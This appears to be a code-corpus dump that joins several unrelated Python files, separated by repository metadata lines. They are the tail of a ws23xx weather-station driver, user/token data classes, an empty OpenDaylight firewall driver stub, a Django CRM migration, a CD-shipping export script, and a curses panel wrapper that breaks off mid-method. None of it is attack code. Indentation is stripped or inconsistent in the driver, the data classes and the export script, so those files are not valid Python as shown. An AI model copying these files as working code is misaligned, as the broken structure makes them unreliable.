Measure(0x4d2, "rt", conv_rain, "rain total", reset=0)
Measure(0x4d8, "rtrw", conv_stmp, "rain total reset when", reset="sw")
Measure(0x4ee, "wsl", conv_wspd, "wind speed min", reset="ws")
Measure(0x4f4, "wsh", conv_wspd, "wind speed max", reset="ws")
Measure(0x4f8, "wslw", conv_stmp, "wind speed min when", reset="sw")
Measure(0x502, "wshw", conv_stmp, "wind speed max when", reset="sw")
Measure(0x527, "wso", conv_wovr, "wind speed overflow")
Measure(0x528, "wsv", conv_wvld, "wind speed validity")
Measure(0x529, "wv", conv_wvel, "wind velocity")
Measure(0x529, "ws", conv_wspd, "wind speed")
Measure(0x52c, "w0", conv_wdir, "wind direction")
Measure(0x52d, "w1", conv_wdir, "wind direction 1")
Measure(0x52e, "w2", conv_wdir, "wind direction 2")
Measure(0x52f, "w3", conv_wdir, "wind direction 3")
Measure(0x530, "w4", conv_wdir, "wind direction 4")
Measure(0x531, "w5", conv_wdir, "wind direction 5")
Measure(0x533, "wsla", conv_wspd, "wind speed min alarm")
Measure(0x538, "wsha", conv_wspd, "wind speed max alarm")
Measure(0x54d, "cn", conv_conn, "connection type")
Measure(0x54f, "cc", conv_per2, "connection time till connect")
Measure(0x5d8, "pa", conv_pres, "pressure absolute")
Measure(0x5e2, "pr", conv_pres, "pressure relative")
Measure(0x5ec, "pc", conv_pres, "pressure correction")
Measure(0x5f6, "pal", conv_pres, "pressure absolute min", reset="pa")
Measure(0x600, "prl", conv_pres, "pressure relative min", reset="pr")
Measure(0x60a, "pah", conv_pres, "pressure absolute max", reset="pa")
Measure(0x614, "prh", conv_pres, "pressure relative max", reset="pr")
Measure(0x61e, "plw", conv_stmp, "pressure min when", reset="sw")
Measure(0x628, "phw", conv_stmp, "pressure max when", reset="sw")
Measure(0x63c, "pla", conv_pres, "pressure min alarm")
Measure(0x650, "pha", conv_pres, "pressure max alarm")
Measure(0x6b2, "hi", conv_per3, "history interval")
Measure(0x6b5, "hc", conv_per3, "history time till sample")
Measure(0x6b8, "hw", conv_stmp, "history last sample when")
Measure(0x6c2, "hp", conv_rec2, "history last record pointer",reset=0)
Measure(0x6c4, "hn", conv_rec2, "history number of records", reset=0)
# get all of the wind info in a single invocation
Measure(0x527, "wind", conv_wind, "wind")
#
# Read the requests.
#
def read_measurements(ws2300, read_requests):
if not read_requests:
return []
#
# Optimise what we have to read.
#
batches = [(m.address, m.conv.nybble_count) for m in read_requests]
batches.sort()
index = 1
addr = {batches[0][0]: 0}
while index < len(batches):
same_sign = (batches[index-1][0] < 0) == (batches[index][0] < 0)
same_area = batches[index-1][0] + batches[index-1][1] + 6 >= batches[index][0]
if not same_sign or not same_area:
addr[batches[index][0]] = index
index += 1
continue
addr[batches[index][0]] = index-1
batches[index-1] = batches[index-1][0], batches[index][0] + batches[index][1] - batches[index-1][0]
del batches[index]
#
# Read the data.
#
nybbles = ws2300.read_batch(batches)
#
# Return the data read in the order it was requested.
#
results = []
for measure in read_requests:
index = addr[measure.address]
offset = measure.address - batches[index][0]
results.append(nybbles[index][offset:offset+measure.conv.nybble_count])
return results
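#
# Worked sketch (not part of the original driver): the optimiser above merges
# two reads when the second starts within six nybbles of the end of the
# first. In temp (0x346, 5 nybbles) and in temp min (0x34b, 5 nybbles) merge
# into one 10 nybble read, while rain 24h (0x497) stays separate. The real
# loop additionally refuses to merge across the sign boundary used by the
# negative computer-time pseudo addresses.
#
def _batch_merge_example():
    batches = [(0x346, 5), (0x34b, 5), (0x497, 6)]
    merged = [batches[0]]
    for address, count in batches[1:]:
        last_address, last_count = merged[-1]
        if last_address + last_count + 6 >= address:
            merged[-1] = (last_address, address + count - last_address)
        else:
            merged.append((address, count))
    return merged    # -> [(0x346, 10), (0x497, 6)]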
# define a main entry point for basic testing of the station without weewx
# engine and service overhead. invoke this as follows from the weewx root dir:
#
# PYTHONPATH=bin python bin/weewx/drivers/ws23xx.py
if __name__ == '__main__':
import optparse
usage = """%prog [options] [--help]"""
port = DEFAULT_PORT
parser = optparse.OptionParser(usage=usage)
parser.add_option('--version', dest='version', action='store_true',
help='display driver version')
parser.add_option('--port', dest='port', metavar='PORT',
help='serial port to which the station is connected')
parser.add_option('--readings', dest='readings', action='store_true',
help='display sensor readings')
parser.add_option("--records", dest="records", type=int, metavar="N",
help="display N station records, oldest to newest")
parser.add_option('--help-measures', dest='hm', action='store_true',
help='display measure names')
parser.add_option('--measure', dest='measure', type=str,
metavar="MEASURE", help='display single measure')
(options, args) = parser.parse_args()
    if options.version:
        print "ws23xx driver version %s" % DRIVER_VERSION
        exit(1)
    if options.port:
        port = options.port
with WS23xx(port) as s:
if options.readings:
data = s.get_raw_data(SENSOR_IDS)
print data
if options.records is not None:
for ts,record in s.gen_records(count=options.records):
print ts,record
if options.measure:
data = s.get_raw_data([options.measure])
print data
if options.hm:
for m in Measure.IDS:
print "%s\t%s" % (m, Measure.IDS[m].name)
|
garretlh/nimbus-drivers
|
src/main/python/nimbusdrivers/ws23xx.py
|
Python
|
gpl-3.0
| 72,031 | 0.004776 |
import datetime
class AuthenticationInfo:
def __init__(self, password, email):
self.Password = password
self.Email = email
class ProfileInfo:
def __init__(self, display_name):
self.DisplayName = display_name
class Token:
def __init__(self, id_token, valid_until):
self.Id = id_token
self.ValidUntil = valid_until
class User:
def __init__(self, id_user, username, display_name, groups):
self.IdUser = id_user
self.Username = username
self.DisplayName = display_name
self.Groups = groups
class Group:
def __init__(self, id_group, name):
self.Id = id_group
self.Name = name
class CreateUserRequest:
def __init__(self, username, authentication, profile):
self.Username = username
self.Authentication = authentication
self.Profile = profile
class ModifyCredentialsRequest:
def __init__(self, username, token, authentication):
self.Username = username
self.Token = token
self.Authentication = authentication
class ModifyProfileRequest:
def __init__(self, username, token, profile):
self.Username = username
self.Token = token
self.Profile = profile
class AddUserToGroupRequest:
def __init__(self, username, token, user_to_add, id_group):
self.Username = username
self.Token = token
self.UserToAdd = user_to_add
self.IdGroup = id_group
class TokenSuccessResponse:
def __init__(self, success, token):
self.Success = success
self.Token = token
@staticmethod
def invalid():
return TokenSuccessResponse(
False,
Token("", datetime.datetime.now()))
class ConnectUserResponse:
def __init__(self, success, token, id_user):
self.Success = success
self.Token = token
self.IdUser = id_user
@staticmethod
def invalid():
return ConnectUserResponse(
False,
Token("", datetime.datetime.now()),
0)
class UserSummaryResponse:
def __init__(self, success, token, display_name, groups):
self.Success = success
self.Token = token
self.DisplayName = display_name
self.Groups = groups
@staticmethod
def invalid():
return UserSummaryResponse(
False,
Token("", datetime.datetime.now()),
"", [])
class UserListResponse:
def __init__(self, success, token, users):
self.Success = success
self.Token = token
self.Users = users
@staticmethod
def invalid():
return UserListResponse(
False,
Token("", datetime.datetime.now()),
[])
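# Illustrative sketch (not part of the library): the classes above are plain
# data holders, so a request can be serialised for transport by walking
# __dict__; a Token's datetime field would need its own handler.
import json

def _create_user_request_example():
    request = CreateUserRequest(
        "alice",
        AuthenticationInfo("s3cret", "alice@example.com"),
        ProfileInfo("Alice"))
    return json.dumps(request, default=lambda o: o.__dict__)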
|
Com-Ericmas001/py-userbase
|
py_userbase/userbase_models.py
|
Python
|
mit
| 2,746 | 0.00437 |
#
# Copyright (C) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from neutron_fwaas.services.firewall.drivers import fwaas_base
from networking_odl.common import client as odl_client
from networking_odl.common import config # noqa
LOG = logging.getLogger(__name__)
class OpenDaylightFwaasDriver(fwaas_base.FwaasDriverBase):
"""OpenDaylight FWaaS Driver
This code is the backend implementation for the OpenDaylight FWaaS
    driver for OpenStack Neutron.
"""
def __init__(self):
LOG.debug("Initializing OpenDaylight FWaaS driver")
self.client = odl_client.OpenDaylightRestClient.create_client()
def create_firewall(self, apply_list, firewall):
"""Create the Firewall with default (drop all) policy.
The default policy will be applied on all the interfaces of
trusted zone.
"""
pass
def delete_firewall(self, apply_list, firewall):
"""Delete firewall.
Removes all policies created by this instance and frees up
all the resources.
"""
pass
def update_firewall(self, apply_list, firewall):
"""Apply the policy on all trusted interfaces.
Remove previous policy and apply the new policy on all trusted
interfaces.
"""
pass
def apply_default_policy(self, apply_list, firewall):
"""Apply the default policy on all trusted interfaces.
Remove current policy and apply the default policy on all trusted
interfaces.
"""
pass
|
flavio-fernandes/networking-odl
|
networking_odl/fwaas/driver.py
|
Python
|
apache-2.0
| 2,105 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CallLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField(auto_now_add=True)),
('note', models.TextField()),
],
),
migrations.CreateModel(
name='Campaign',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('description', models.TextField(null=True, blank=True)),
],
),
migrations.CreateModel(
name='Company',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('website', models.URLField(null=True, blank=True)),
('address1', models.CharField(max_length=200, null=True, blank=True)),
('address2', models.CharField(max_length=200, null=True, blank=True)),
('city', models.CharField(max_length=200, null=True, blank=True)),
('state', models.CharField(max_length=200, null=True, blank=True)),
('zipcode', models.CharField(max_length=200, null=True, blank=True)),
('country', models.CharField(max_length=200, null=True, blank=True)),
('phone', models.CharField(max_length=200, null=True, blank=True)),
],
options={
'verbose_name_plural': 'companies',
},
),
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('first_name', models.CharField(max_length=200)),
('last_name', models.CharField(max_length=200)),
('address1', models.CharField(max_length=200, null=True, blank=True)),
('address2', models.CharField(max_length=200, null=True, blank=True)),
('city', models.CharField(max_length=200, null=True, blank=True)),
('state', models.CharField(max_length=200, null=True, blank=True)),
('zipcode', models.CharField(max_length=200, null=True, blank=True)),
('country', models.CharField(max_length=200, null=True, blank=True)),
('phone', models.CharField(max_length=200, null=True, blank=True)),
('email', models.EmailField(max_length=200, null=True, blank=True)),
('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
],
),
migrations.CreateModel(
name='Opportunity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.FloatField(help_text=b'How much this opportunity is worth to the organization')),
('create_date', models.DateTimeField(auto_now_add=True)),
('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
('contact', models.ForeignKey(to='crm.Contact')),
('source', models.ForeignKey(help_text=b'How did this contact find out about us?', to='crm.Campaign')),
],
options={
'verbose_name_plural': 'opportunities',
},
),
migrations.CreateModel(
name='OpportunityStage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('opportunity', models.ForeignKey(to='crm.Opportunity')),
],
),
migrations.CreateModel(
name='Reminder',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateField()),
('note', models.CharField(max_length=200)),
('completed', models.BooleanField(default=False)),
('opportunity', models.ForeignKey(to='crm.Opportunity')),
],
),
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('link', models.URLField()),
],
),
migrations.CreateModel(
name='Stage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('order', models.IntegerField(help_text=b'The order this is displayed on the screen')),
('description', models.TextField(null=True, blank=True)),
('value', models.IntegerField(help_text=b'On a scale of 0 to 100 of the stage of the pipeline')),
],
),
migrations.AddField(
model_name='opportunitystage',
name='stage',
field=models.ForeignKey(to='crm.Stage'),
),
migrations.AddField(
model_name='opportunitystage',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='opportunity',
name='stage',
field=models.ForeignKey(to='crm.Stage'),
),
migrations.AddField(
model_name='opportunity',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='calllog',
name='opportunity',
field=models.ForeignKey(to='crm.Opportunity'),
),
migrations.AddField(
model_name='calllog',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
]
|
i2c2-caj/CS4990
|
Homework/crminal/crm/migrations/0001_initial.py
|
Python
|
gpl-2.0
| 6,674 | 0.004495 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import locale
import os
import sys
from datetime import date
from kargoxml import add_column
script_dir = os.path.split(os.path.abspath(os.path.dirname(__file__)))[0]
project_dir = os.path.split(script_dir)[0]
sys.path.append(project_dir)
sys.path.append(os.path.split(project_dir)[0])
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from oi.shipit.models import CdClient
from oi.shipit.models import PardusVersion
from django.template.defaultfilters import slugify
if __name__ == '__main__':
args = sys.argv
pardus_versions = PardusVersion.objects.all()
if len(args) != 2:
print("Usage: python %s [limit]") % __file__
sys.exit()
try:
limit = int(args[-1])
except ValueError:
print("Invalid limit: %s") % args[-1]
sys.exit()
#locale.setlocale(locale.LC_ALL, "tr_TR.UTF-8")
for version in pardus_versions:
cdclient = CdClient.objects.filter(confirmed=1,
sent=0, taken=0, version=version).order_by('date')[:limit]
add_column(cdclient, date.today().isoformat(), slugify(version))
|
MehmetNuri/ozgurlukicin
|
scripts/kargo/main.py
|
Python
|
gpl-3.0
| 1,129 | 0.004429 |
"""
Wrapper for safely working with curses subwindows.
Based on code from the arm project, developed by Damian Johnson under GPLv3
(www.atagar.com - atagar@torproject.org)
"""
import os
import copy
import time
import curses
import curses.ascii
import curses.textpad
from threading import RLock
from multiprocessing import Queue
from input import *
from tools import *
# global ui lock governing all panel instances (curses isn't thread safe and
# concurrency bugs produce especially sinister glitches)
CURSES_LOCK = RLock()
# tags used by addfstr - this maps to functor/argument combinations since the
# actual values (in the case of color attributes) might not yet be initialized
def _noOp(arg): return arg
FORMAT_TAGS = {"<b>": (_noOp, curses.A_BOLD),
"<u>": (_noOp, curses.A_UNDERLINE),
"<h>": (_noOp, curses.A_STANDOUT)}
for colorLabel in COLOR_LIST: FORMAT_TAGS["<%s>" % colorLabel] = (getColor, colorLabel)
# prevents curses redraws if set
HALT_ACTIVITY = False
OptionResult = Enum("BACK", "NEXT")
class Panel():
"""
Wrapper for curses subwindows. This hides most of the ugliness in common
curses operations including:
- locking when concurrently drawing to multiple windows
- gracefully handle terminal resizing
- clip text that falls outside the panel
- convenience methods for word wrap, in-line formatting, etc
This uses a design akin to Swing where panel instances provide their display
implementation by overwriting the draw() method, and are redrawn with
redraw().
"""
def __init__(self, parent, name, top, left=0, height= -1, width= -1):
"""
Creates a durable wrapper for a curses subwindow in the given parent.
Arguments:
parent - parent curses window
name - identifier for the panel
top - positioning of top within parent
left - positioning of the left edge within the parent
height - maximum height of panel (uses all available space if -1)
width - maximum width of panel (uses all available space if -1)
"""
# The not-so-pythonic getters for these parameters are because some
# implementations aren't entirely deterministic (for instance panels
# might chose their height based on its parent's current width).
self.panelName = name
self.parent = parent
self.visible = False
self.titleVisible = True
# Attributes for pausing. The pauseAttr contains variables our getAttr
# method is tracking, and the pause buffer has copies of the values from
# when we were last unpaused (unused unless we're paused).
self.paused = False
self.pauseAttr = []
self.pauseBuffer = {}
self.pauseTime = -1
self.top = top
self.left = left
self.height = height
self.width = width
# The panel's subwindow instance. This is made available to implementors
# via their draw method and shouldn't be accessed directly.
#
# This is None if either the subwindow failed to be created or needs to be
# remade before it's used. The later could be for a couple reasons:
# - The subwindow was never initialized.
# - Any of the parameters used for subwindow initialization have changed.
self.win = None
self.maxY, self.maxX = -1, -1 # subwindow dimensions when last redrawn
def getName(self):
"""
Provides panel's identifier.
"""
return self.panelName
def isTitleVisible(self):
"""
True if the title is configured to be visible, False otherwise.
"""
return self.titleVisible
def setTitleVisible(self, isVisible):
"""
Configures the panel's title to be visible or not when it's next redrawn.
        This is not guaranteed to be respected (not all panels have a title).
"""
self.titleVisible = isVisible
def getParent(self):
"""
Provides the parent used to create subwindows.
"""
return self.parent
def setParent(self, parent):
"""
Changes the parent used to create subwindows.
Arguments:
parent - parent curses window
"""
if self.parent != parent:
self.parent = parent
self.win = None
def isVisible(self):
"""
Provides if the panel's configured to be visible or not.
"""
return self.visible
def setVisible(self, isVisible):
"""
Toggles if the panel is visible or not.
Arguments:
isVisible - panel is redrawn when requested if true, skipped otherwise
"""
self.visible = isVisible
def isPaused(self):
"""
Provides if the panel's configured to be paused or not.
"""
return self.paused
def setPauseAttr(self, attr):
"""
Configures the panel to track the given attribute so that getAttr provides
the value when it was last unpaused (or its current value if we're
currently unpaused). For instance...
> self.setPauseAttr("myVar")
> self.myVar = 5
> self.myVar = 6 # self.getAttr("myVar") -> 6
> self.setPaused(True)
> self.myVar = 7 # self.getAttr("myVar") -> 6
> self.setPaused(False)
> self.myVar = 7 # self.getAttr("myVar") -> 7
Arguments:
attr - parameter to be tracked for getAttr
"""
self.pauseAttr.append(attr)
self.pauseBuffer[attr] = self.copyAttr(attr)
def getAttr(self, attr):
"""
Provides the value of the given attribute when we were last unpaused. If
we're currently unpaused then this is the current value. If untracked this
returns None.
Arguments:
attr - local variable to be returned
"""
if not attr in self.pauseAttr: return None
elif self.paused: return self.pauseBuffer[attr]
else: return self.__dict__.get(attr)
def copyAttr(self, attr):
"""
Provides a duplicate of the given configuration value, suitable for the
pause buffer.
Arguments:
attr - parameter to be provided back
"""
currentValue = self.__dict__.get(attr)
return copy.copy(currentValue)
def setPaused(self, isPause, suppressRedraw=False):
"""
Toggles if the panel is paused or not. This causes the panel to be redrawn
when toggling is pause state unless told to do otherwise. This is
important when pausing since otherwise the panel's display could change
when redrawn for other reasons.
This returns True if the panel's pause state was changed, False otherwise.
Arguments:
isPause - freezes the state of the pause attributes if true, makes
them editable otherwise
suppressRedraw - if true then this will never redraw the panel
"""
if isPause != self.paused:
if isPause: self.pauseTime = time.time()
self.paused = isPause
if isPause:
# copies tracked attributes so we know what they were before pausing
for attr in self.pauseAttr:
self.pauseBuffer[attr] = self.copyAttr(attr)
if not suppressRedraw: self.redraw(True)
return True
else: return False
def getPauseTime(self):
"""
Provides the time that we were last paused, returning -1 if we've never
been paused.
"""
return self.pauseTime
def getTop(self):
"""
Provides the position subwindows are placed at within its parent.
"""
return self.top
def setTop(self, top):
"""
Changes the position where subwindows are placed within its parent.
Arguments:
top - positioning of top within parent
"""
if self.top != top:
self.top = top
self.win = None
def getLeft(self):
"""
Provides the left position where this subwindow is placed within its
parent.
"""
return self.left
def setLeft(self, left):
"""
Changes the left position where this subwindow is placed within its parent.
Arguments:
left - positioning of top within parent
"""
if self.left != left:
self.left = left
self.win = None
def getHeight(self):
"""
Provides the height used for subwindows (-1 if it isn't limited).
"""
return self.height
def setHeight(self, height):
"""
Changes the height used for subwindows. This uses all available space if -1.
Arguments:
height - maximum height of panel (uses all available space if -1)
"""
if self.height != height:
self.height = height
self.win = None
def getWidth(self):
"""
Provides the width used for subwindows (-1 if it isn't limited).
"""
return self.width
def setWidth(self, width):
"""
Changes the width used for subwindows. This uses all available space if -1.
Arguments:
width - maximum width of panel (uses all available space if -1)
"""
if self.width != width:
self.width = width
self.win = None
def getPreferredSize(self):
"""
Provides the dimensions the subwindow would use when next redrawn, given
that none of the properties of the panel or parent change before then. This
returns a tuple of (height, width).
"""
newHeight, newWidth = self.parent.getmaxyx()
setHeight, setWidth = self.getHeight(), self.getWidth()
newHeight = max(0, newHeight - self.top)
newWidth = max(0, newWidth - self.left)
if setHeight != -1: newHeight = min(newHeight, setHeight)
if setWidth != -1: newWidth = min(newWidth, setWidth)
return (newHeight, newWidth)
def handleKey(self, key):
"""
Handler for user input. This returns true if the key press was consumed,
false otherwise.
Arguments:
key - keycode for the key pressed
"""
return False
def getHelp(self):
"""
Provides help information for the controls this page provides. This is a
list of tuples of the form...
(control, description, status)
"""
return []
def draw(self, width, height):
"""
Draws display's content. This is meant to be overwritten by
implementations and not called directly (use redraw() instead). The
dimensions provided are the drawable dimensions, which in terms of width is
a column less than the actual space.
Arguments:
width - horizontal space available for content
height - vertical space available for content
"""
pass
def redraw(self, forceRedraw=False, block=False):
"""
Clears display and redraws its content. This can skip redrawing content if
able (ie, the subwindow's unchanged), instead just refreshing the display.
Arguments:
forceRedraw - forces the content to be cleared and redrawn if true
block - if drawing concurrently with other panels this determines
if the request is willing to wait its turn or should be
abandoned
"""
# skipped if not currently visible or activity has been halted
if not self.isVisible() or HALT_ACTIVITY: return
# if the panel's completely outside its parent then this is a no-op
newHeight, newWidth = self.getPreferredSize()
if newHeight == 0 or newWidth == 0:
self.win = None
return
# recreates the subwindow if necessary
isNewWindow = self._resetSubwindow()
# The reset argument is disregarded in a couple of situations:
# - The subwindow's been recreated (obviously it then doesn't have the old
# content to refresh).
# - The subwindow's dimensions have changed since last drawn (this will
# likely change the content's layout)
subwinMaxY, subwinMaxX = self.win.getmaxyx()
if isNewWindow or subwinMaxY != self.maxY or subwinMaxX != self.maxX:
forceRedraw = True
self.maxY, self.maxX = subwinMaxY, subwinMaxX
if not CURSES_LOCK.acquire(block): return
try:
if forceRedraw:
self.win.erase() # clears any old contents
self.draw(self.maxX, self.maxY)
self.win.refresh()
finally:
CURSES_LOCK.release()
def hline(self, y, x, length, attr=curses.A_NORMAL):
"""
Draws a horizontal line. This should only be called from the context of a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
length - length the line spans
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
drawLength = min(length, self.maxX - x)
self.win.hline(y, x, curses.ACS_HLINE | attr, drawLength)
except:
# in edge cases drawing could cause a _curses.error
pass
def vline(self, y, x, length, attr=curses.A_NORMAL):
"""
Draws a vertical line. This should only be called from the context of a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
length - length the line spans
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
drawLength = min(length, self.maxY - y)
self.win.vline(y, x, curses.ACS_VLINE | attr, drawLength)
except:
# in edge cases drawing could cause a _curses.error
pass
def addch(self, y, x, char, attr=curses.A_NORMAL):
"""
Draws a single character. This should only be called from the context of a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
char - character to be drawn
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
self.win.addch(y, x, char, attr)
except:
# in edge cases drawing could cause a _curses.error
pass
def addstr(self, y, x, msg, attr=curses.A_NORMAL):
"""
Writes string to subwindow if able. This takes into account screen bounds
to avoid making curses upset. This should only be called from the context
of a panel's draw method.
Arguments:
y - vertical location
x - horizontal location
msg - text to be added
attr - text attributes
"""
# subwindows need a single character buffer (either in the x or y
        # direction) from actual content to prevent a crash when shrunk
if self.win and self.maxX > x and self.maxY > y:
try:
self.win.addstr(y, x, msg[:self.maxX - x], attr)
except:
# this might produce a _curses.error during edge cases, for instance
# when resizing with visible popups
pass
def addfstr(self, y, x, msg):
"""
Writes string to subwindow. The message can contain xhtml-style tags for
formatting, including:
<b>text</b> bold
<u>text</u> underline
<h>text</h> highlight
<[color]>text</[color]> use color (see getColor() for constants)
Tag nesting is supported and tag closing is strictly enforced (raising an
exception for invalid formatting). Unrecognized tags are treated as normal
text. This should only be called from the context of a panel's draw method.
Text in multiple color tags (for instance "<blue><red>hello</red></blue>")
uses the bitwise OR of those flags (hint: that's probably not what you
want).
Arguments:
y - vertical location
x - horizontal location
msg - formatted text to be added
"""
if self.win and self.maxY > y:
formatting = [curses.A_NORMAL]
expectedCloseTags = []
unusedMsg = msg
while self.maxX > x and len(unusedMsg) > 0:
                # finds next consumable tag (left as None if there aren't any left)
nextTag, tagStart, tagEnd = None, -1, -1
tmpChecked = 0 # portion of the message cleared for having any valid tags
expectedTags = FORMAT_TAGS.keys() + expectedCloseTags
while nextTag == None:
tagStart = unusedMsg.find("<", tmpChecked)
tagEnd = unusedMsg.find(">", tagStart) + 1 if tagStart != -1 else -1
if tagStart == -1 or tagEnd == -1: break # no more tags to consume
else:
# check if the tag we've found matches anything being expected
if unusedMsg[tagStart:tagEnd] in expectedTags:
nextTag = unusedMsg[tagStart:tagEnd]
break # found a tag to use
else:
# not a valid tag - narrow search to everything after it
tmpChecked = tagEnd
# splits into text before and after tag
if nextTag:
msgSegment = unusedMsg[:tagStart]
unusedMsg = unusedMsg[tagEnd:]
else:
msgSegment = unusedMsg
unusedMsg = ""
# adds text before tag with current formatting
attr = 0
for format in formatting: attr |= format
self.win.addstr(y, x, msgSegment[:self.maxX - x - 1], attr)
x += len(msgSegment)
# applies tag attributes for future text
if nextTag:
formatTag = "<" + nextTag[2:] if nextTag.startswith("</") else nextTag
formatMatch = FORMAT_TAGS[formatTag][0](FORMAT_TAGS[formatTag][1])
if not nextTag.startswith("</"):
# open tag - add formatting
expectedCloseTags.append("</" + nextTag[1:])
formatting.append(formatMatch)
else:
# close tag - remove formatting
expectedCloseTags.remove(nextTag)
formatting.remove(formatMatch)
# only check for unclosed tags if we processed the whole message (if we
# stopped processing prematurely it might still be valid)
if expectedCloseTags and not unusedMsg:
# if we're done then raise an exception for any unclosed tags (tisk, tisk)
baseMsg = "Unclosed formatting tag%s:" % ("s" if len(expectedCloseTags) > 1 else "")
raise ValueError("%s: '%s'\n \"%s\"" % (baseMsg, "', '".join(expectedCloseTags), msg))
def getstr(self, y, x, initialText="", format=None, maxWidth=None, validator=None):
"""
Provides a text field where the user can input a string, blocking until
they've done so and returning the result. If the user presses escape then
this terminates and provides back None. This should only be called from
the context of a panel's draw method.
This blanks any content within the space that the input field is rendered
(otherwise stray characters would be interpreted as part of the initial
input).
Arguments:
y - vertical location
x - horizontal location
initialText - starting text in this field
format - format used for the text
maxWidth - maximum width for the text field
validator - custom TextInputValidator for handling keybindings
"""
if not format: format = curses.A_NORMAL
# makes cursor visible
try: previousCursorState = curses.curs_set(1)
except curses.error: previousCursorState = 0
# temporary subwindow for user input
displayWidth = self.getPreferredSize()[1]
if maxWidth: displayWidth = min(displayWidth, maxWidth + x)
inputSubwindow = self.parent.subwin(1, displayWidth - x, self.top + y, self.left + x)
        # blanks the field's area, filling it with the font in case it's highlighting
inputSubwindow.clear()
inputSubwindow.bkgd(' ', format)
# prepopulates the initial text
if initialText:
inputSubwindow.addstr(0, 0, initialText[:displayWidth - x - 1], format)
# Displays the text field, blocking until the user's done. This closes the
# text panel and returns userInput to the initial text if the user presses
# escape.
textbox = curses.textpad.Textbox(inputSubwindow)
if not validator:
validator = BasicValidator()
textbox.win.attron(format)
userInput = textbox.edit(lambda key: validator.validate(key, textbox)).strip()
textbox.win.attroff(format)
if textbox.lastcmd == curses.ascii.BEL: userInput = None
        # reverts visibility settings
try: curses.curs_set(previousCursorState)
except curses.error: pass
return userInput
def addScrollBar(self, top, bottom, size, drawTop=0, drawBottom= -1, drawLeft=0, drawScrollBox=True):
"""
Draws a left justified scroll bar reflecting position within a vertical
listing. This is shorted if necessary, and left undrawn if no space is
available. The bottom is squared off, having a layout like:
|
*|
*|
*|
|
-+
This should only be called from the context of a panel's draw method.
Arguments:
top - list index for the top-most visible element
bottom - list index for the bottom-most visible element
size - size of the list in which the listed elements are contained
drawTop - starting row where the scroll bar should be drawn
drawBottom - ending row where the scroll bar should end, -1 if it should
span to the bottom of the panel
      drawLeft - left offset at which to draw the scroll bar
      drawScrollBox - if true, a box is drawn around the scroll bar
    """
if (self.maxY - drawTop) < 2: return # not enough room
# sets drawBottom to be the actual row on which the scrollbar should end
if drawBottom == -1: drawBottom = self.maxY - 1
else: drawBottom = min(drawBottom, self.maxY - 1)
# determines scrollbar dimensions
scrollbarHeight = drawBottom - drawTop
sliderTop = scrollbarHeight * top / size
sliderSize = scrollbarHeight * (bottom - top) / size
# ensures slider isn't at top or bottom unless really at those extreme bounds
if top > 0: sliderTop = max(sliderTop, 1)
if bottom != size: sliderTop = min(sliderTop, scrollbarHeight - sliderSize - 2)
# avoids a rounding error that causes the scrollbar to be too low when at
# the bottom
if bottom == size: sliderTop = scrollbarHeight - sliderSize - 1
# draws scrollbar slider
for i in range(scrollbarHeight):
if i >= sliderTop and i <= sliderTop + sliderSize:
self.addstr(i + drawTop, drawLeft, " ", curses.A_STANDOUT)
else:
self.addstr(i + drawTop, drawLeft, " ")
# draws box around the scroll bar
if drawScrollBox:
self.vline(drawTop, drawLeft + 1, drawBottom - 1)
self.addch(drawBottom, drawLeft + 1, curses.ACS_LRCORNER)
self.addch(drawBottom, drawLeft, curses.ACS_HLINE)
def _resetSubwindow(self):
"""
Create a new subwindow instance for the panel if:
- Panel currently doesn't have a subwindow (was uninitialized or
invalidated).
- There's room for the panel to grow vertically (curses automatically
lets subwindows regrow horizontally, but not vertically).
- The subwindow has been displaced. This is a curses display bug that
manifests if the terminal's shrank then re-expanded. Displaced
subwindows are never restored to their proper position, resulting in
graphical glitches if we draw to them.
- The preferred size is smaller than the actual size (should shrink).
This returns True if a new subwindow instance was created, False otherwise.
"""
newHeight, newWidth = self.getPreferredSize()
if newHeight == 0: return False # subwindow would be outside its parent
# determines if a new subwindow should be recreated
recreate = self.win == None
if self.win:
